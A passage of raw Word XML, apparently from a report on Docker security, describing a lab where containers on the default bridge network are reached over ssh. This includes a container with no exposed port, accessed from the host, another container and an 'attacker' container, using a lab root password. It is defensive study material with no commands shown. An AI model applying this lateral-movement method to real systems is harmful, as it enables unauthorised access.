                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F70BF5" w14:textId="664E4EA0" w:rsidR="006535DD" w:rsidRDefault="006535DD" w:rsidP="00D24A84">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc86858629"/>
      <w:bookmarkStart w:id="160" w:name="_Toc86867519"/>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000B4EE0" w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="00D24A84" w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>published to the host.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="5BA0441A" w14:textId="658FD893" w:rsidR="008B6A4D" w:rsidRPr="008B6A4D" w:rsidRDefault="006E0F4E" w:rsidP="008B6A4D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Consequently, </w:t>
      </w:r>
      <w:r w:rsidR="005F70CD">
        <w:t xml:space="preserve">the author </w:t>
      </w:r>
      <w:r w:rsidR="004D0B50">
        <w:t>was able to ssh</w:t>
      </w:r>
      <w:r w:rsidR="005F70CD">
        <w:t xml:space="preserve"> into</w:t>
      </w:r>
      <w:r w:rsidR="00AA5297">
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="00B753B7">
        <w:t xml:space="preserve">e exposed </w:t>
      </w:r>
      <w:r w:rsidR="0055181B">
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="00AE0C88">
        <w:t xml:space="preserve">of con_ssh </w:t>
      </w:r>
      <w:r w:rsidR="0055181B">
        <w:t>via the forward</w:t>
      </w:r>
      <w:r w:rsidR="001259BD">
        <w:t>ed port 49153</w:t>
      </w:r>
      <w:r w:rsidR="0055181B">
        <w:t>, as shown i</w:t>
      </w:r>
      <w:r w:rsidR="004D0B50">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="00662FF8">
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="007B5BFB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E1DB8">
        <w:t xml:space="preserve"> As mentioned above, the </w:t>
      </w:r>
      <w:r w:rsidR="003F20E1">
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="00264D2C">
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="003F20E1">
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidR="001F6586">
        <w:t>is attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00F55B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00264D2C">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00DA50D4">
        <w:t>ven external hosts to the Docker host can also access the container via this forwarded port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C129FE" w14:textId="7754E913" w:rsidR="00B948A3" w:rsidRDefault="00004001" w:rsidP="00003BBE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32CD78E2" wp14:editId="548843B8">
            <wp:extent cx="4394200" cy="1346200"/>
            <wp:effectExtent l="0" t="0" r="635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394200" cy="1346200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D190F" w14:textId="064BD9BE" w:rsidR="00A83B58" w:rsidRDefault="00730629" w:rsidP="004A2017">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc86858630"/>
      <w:bookmarkStart w:id="162" w:name="_Toc86867520"/>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00031724" w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh into the con_ssh via the forwarded port.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="7C06B29F" w14:textId="434D892E" w:rsidR="003A6CF1" w:rsidRDefault="004A2017" w:rsidP="004A2017">
      <w:r>
        <w:t xml:space="preserve">The containers communicate with each other as they are </w:t>
      </w:r>
      <w:r w:rsidR="000B5F05">
        <w:t>connected</w:t>
      </w:r>
      <w:r w:rsidR="00FF0713">
        <w:t xml:space="preserve"> to the same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r w:rsidR="000B5F05">
        <w:t>fault</w:t>
      </w:r>
      <w:r w:rsidR="00FF0713">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B5F05">
        <w:t>virtual bridge</w:t>
      </w:r>
      <w:r w:rsidR="00FF0713">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C534B">
        <w:t xml:space="preserve"> However, the default Docker network bridge </w:t>
      </w:r>
      <w:r w:rsidR="002B1B32">
        <w:t>does not</w:t>
      </w:r>
      <w:r w:rsidR="00576E4D">
        <w:t xml:space="preserve"> have the capabilities to filter </w:t>
      </w:r>
      <w:r w:rsidR="00180158">
        <w:t>network traffic or packets.</w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t xml:space="preserve"> This means that external host</w:t>
      </w:r>
      <w:r w:rsidR="00AF19E0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t xml:space="preserve"> or any </w:t>
      </w:r>
      <w:r w:rsidR="00BF3962">
        <w:t xml:space="preserve">other </w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00BF3962">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t xml:space="preserve"> can exploit </w:t>
      </w:r>
      <w:r w:rsidR="00EF2CBA">
        <w:t>the vulnerabilities of the bridge</w:t>
      </w:r>
      <w:r w:rsidR="00AF19E0">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00BF3962">
        <w:t xml:space="preserve"> access </w:t>
      </w:r>
      <w:r w:rsidR="007B1ACA">
        <w:t>the inside containers.</w:t>
      </w:r>
      <w:r w:rsidR="007018E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB286D">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007018E6">
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="00FB286D">
        <w:t>exploit such vulnerabilities, t</w:t>
      </w:r>
      <w:r w:rsidR="00A359C8">
        <w:t>he first container</w:t>
      </w:r>
      <w:r w:rsidR="00330AD2">
        <w:t xml:space="preserve"> (con_ssh)</w:t>
      </w:r>
      <w:r w:rsidR="00A359C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00973C16">
        <w:t>is configured</w:t>
      </w:r>
      <w:r w:rsidR="00E92306">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00973C16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C07480">
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="00330AD2">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00C07480">
        <w:t xml:space="preserve"> port 22</w:t>
      </w:r>
      <w:r w:rsidR="003A6CF1">
        <w:t xml:space="preserve"> to allow ssh connections</w:t>
      </w:r>
      <w:r w:rsidR="00A34E8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9680D">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="004464E1">
        <w:t>the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="00A34E8A">
        <w:t xml:space="preserve"> and external </w:t>
      </w:r>
      <w:r w:rsidR="00F63080">
        <w:t>hosts, as well as co</w:t>
      </w:r>
      <w:r w:rsidR="00E92306">
        <w:t>ntainers.</w:t>
      </w:r>
      <w:r w:rsidR="00D12E73">
        <w:t xml:space="preserve"> Conversely</w:t>
      </w:r>
      <w:r w:rsidR="00A43E53">
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="00270D08">
        <w:t xml:space="preserve"> second container (con_nossh)</w:t>
      </w:r>
      <w:r w:rsidR="00ED72C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86503">
        <w:t>accepts</w:t>
      </w:r>
      <w:r w:rsidR="00DA453E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E350D">
        <w:t xml:space="preserve">neither </w:t>
      </w:r>
      <w:r w:rsidR="00DA453E">
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidR="007E17D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A635AE">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="003E350D">
        <w:t>or any</w:t>
      </w:r>
      <w:r w:rsidR="007E17D7">
        <w:t xml:space="preserve"> other connections</w:t>
      </w:r>
      <w:r w:rsidR="00635CA6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00370165">
        <w:t xml:space="preserve"> The aim is to compromise </w:t>
      </w:r>
      <w:r w:rsidR="000C4297">
        <w:t xml:space="preserve">the second container </w:t>
      </w:r>
      <w:r w:rsidR="00C13889">
        <w:t xml:space="preserve">from the </w:t>
      </w:r>
      <w:r w:rsidR="00E53F57">
        <w:t>host through its bridge IP address</w:t>
      </w:r>
      <w:r w:rsidR="009A5448">
        <w:t>, al</w:t>
      </w:r>
      <w:r w:rsidR="007D2BDA">
        <w:t xml:space="preserve">though </w:t>
      </w:r>
      <w:r w:rsidR="00E3296E">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00245325">
        <w:t xml:space="preserve">s ssh port </w:t>
      </w:r>
      <w:r w:rsidR="00BA739C">
        <w:t>is disabled.</w:t>
      </w:r>
      <w:r w:rsidR="00FB24CD">
        <w:t xml:space="preserve"> As shown in figure 40, the </w:t>
      </w:r>
      <w:r w:rsidR="00B8097D">
        <w:t xml:space="preserve">con_nossh container is logged into </w:t>
      </w:r>
      <w:r w:rsidR="00137B87">
        <w:t>from the Ubuntu machine</w:t>
      </w:r>
      <w:r w:rsidR="004C5C70">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF7A92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00372875">
        <w:t>This implies that external host</w:t>
      </w:r>
      <w:r w:rsidR="00DF2315">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00372875">
        <w:t xml:space="preserve"> that can see the Docker host can also access the </w:t>
      </w:r>
      <w:r w:rsidR="00101276">
        <w:t xml:space="preserve">con_ssh container </w:t>
      </w:r>
      <w:r w:rsidR="005D46E4">
        <w:t>through the port</w:t>
      </w:r>
      <w:r w:rsidR="00A624A2">
        <w:t xml:space="preserve"> shown in figure 39.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0F917" w14:textId="4926DAE8" w:rsidR="00B36E6A" w:rsidRDefault="00B36E6A" w:rsidP="00B36E6A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3607E262" wp14:editId="182E740D">
            <wp:extent cx="4562626" cy="24257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589824" cy="2440160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A8DB5B" w14:textId="28BA1DE8" w:rsidR="00B36E6A" w:rsidRDefault="00B36E6A" w:rsidP="00474094">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc86858631"/>
      <w:bookmarkStart w:id="164" w:name="_Toc86867521"/>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00564FD8" w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00474094" w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host ssh to the con_nossh container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="632BFC24" w14:textId="195B5AC4" w:rsidR="001259BD" w:rsidRPr="001259BD" w:rsidRDefault="003D1736" w:rsidP="001259BD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Alternatively, the con_nossh </w:t>
      </w:r>
      <w:r w:rsidR="007A4A4D">
        <w:t>also accept</w:t>
      </w:r>
      <w:r w:rsidR="0067787C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007A4A4D">
        <w:t xml:space="preserve"> ssh connections from </w:t>
      </w:r>
      <w:r w:rsidR="005273D7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00895CEC">
        <w:t>con_ssh container</w:t>
      </w:r>
      <w:r w:rsidR="00863DF4">
        <w:t>, though its ssh port is</w:t>
      </w:r>
      <w:r w:rsidR="006F50C2">
        <w:t xml:space="preserve"> not exposed.</w:t>
      </w:r>
      <w:r w:rsidR="007F2247">
        <w:t xml:space="preserve"> This is</w:t>
      </w:r>
      <w:r w:rsidR="00576200">
        <w:t xml:space="preserve"> mainly</w:t>
      </w:r>
      <w:r w:rsidR="007F2247">
        <w:t xml:space="preserve"> because the </w:t>
      </w:r>
      <w:r w:rsidR="000D72F8">
        <w:t xml:space="preserve">default network bridge does not </w:t>
      </w:r>
      <w:r w:rsidR="007E0F97">
        <w:t xml:space="preserve">filter </w:t>
      </w:r>
      <w:r w:rsidR="006D719B">
        <w:t>traffic</w:t>
      </w:r>
      <w:r w:rsidR="00000B3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D719B">
        <w:t xml:space="preserve">coming from </w:t>
      </w:r>
      <w:r w:rsidR="000A60C9">
        <w:t>containers connected to the same virtual bridge.</w:t>
      </w:r>
      <w:r w:rsidR="00376404">
        <w:t xml:space="preserve"> Figure </w:t>
      </w:r>
      <w:r w:rsidR="00701943">
        <w:t xml:space="preserve">41 shows </w:t>
      </w:r>
      <w:r w:rsidR="00DA3078">
        <w:t xml:space="preserve">ssh connection </w:t>
      </w:r>
      <w:r w:rsidR="005650A8">
        <w:t>from the ssh exposed container to the non-exposed</w:t>
      </w:r>
      <w:r w:rsidR="001F7688">
        <w:t xml:space="preserve"> container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6A108" w14:textId="23930BD0" w:rsidR="00D15F81" w:rsidRDefault="00735AEB" w:rsidP="00003BBE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA429CD" wp14:editId="7C79BA53">
            <wp:extent cx="5251450" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="635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51450" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38E29C" w14:textId="55E11446" w:rsidR="00B814D5" w:rsidRDefault="00B814D5" w:rsidP="00B814D5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc86858632"/>
      <w:bookmarkStart w:id="166" w:name="_Toc86867522"/>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: ssh from con_ssh to con_nossh.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w14:paraId="28339E86" w14:textId="33D50ABD" w:rsidR="001F7688" w:rsidRDefault="008148F2" w:rsidP="001F7688">
      <w:r>
        <w:t xml:space="preserve">Similarly, the attacker (alpine) container </w:t>
      </w:r>
      <w:r w:rsidR="00B337D1">
        <w:t xml:space="preserve">accessed the non-ssh container, as shown </w:t>
      </w:r>
      <w:r w:rsidR="0049463C">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00142C90">
        <w:t>figure 42.</w:t>
      </w:r>
      <w:r w:rsidR="00680756">
        <w:t xml:space="preserve"> At this point, the attacker can exploit the container environment </w:t>
      </w:r>
      <w:r w:rsidR="00F34E35">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00597CD3">
        <w:t>updat</w:t>
      </w:r>
      <w:r w:rsidR="00DC0F66">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00597CD3">
        <w:t xml:space="preserve"> packages and necessary tools</w:t>
      </w:r>
      <w:r w:rsidR="00DC0F66">
        <w:t xml:space="preserve">, as </w:t>
      </w:r>
      <w:r w:rsidR="00B57887">
